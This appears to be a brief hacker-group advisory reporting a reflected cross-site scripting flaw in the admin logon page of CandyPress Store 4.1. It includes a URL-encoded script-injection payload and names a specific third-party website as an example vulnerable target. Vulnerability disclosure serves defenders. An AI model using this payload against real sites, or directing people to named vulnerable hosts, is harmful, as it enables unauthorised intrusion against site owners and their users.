^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Product : CandyPress Store
Version : 4.1
Bug Kind: XSS
Vendor Site: http://www.candypress.com
Discovered by: Snoop Security Researching Committee
We Are: it's an Underground...so ssshh!!! no one knows us...
This bug belongs to: Snoop Security and darkness_king
www.snoop-security.com
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
About CandyPress:
CandyPress Store is an eCommerce solution based on popular Microsoft
technologies. It is designed to run on an IIS web server that is ASP and
VBScript enabled. In addition, the software is designed to work with SQL
Server or MS Access databases.

The affected page is /admin/logon.asp, through its msg parameter:
/admin/logon.asp?msg=Snoop Security
and also this way:
/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E

Some example vulnerable pages:
http://www.ineedfrom.com/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E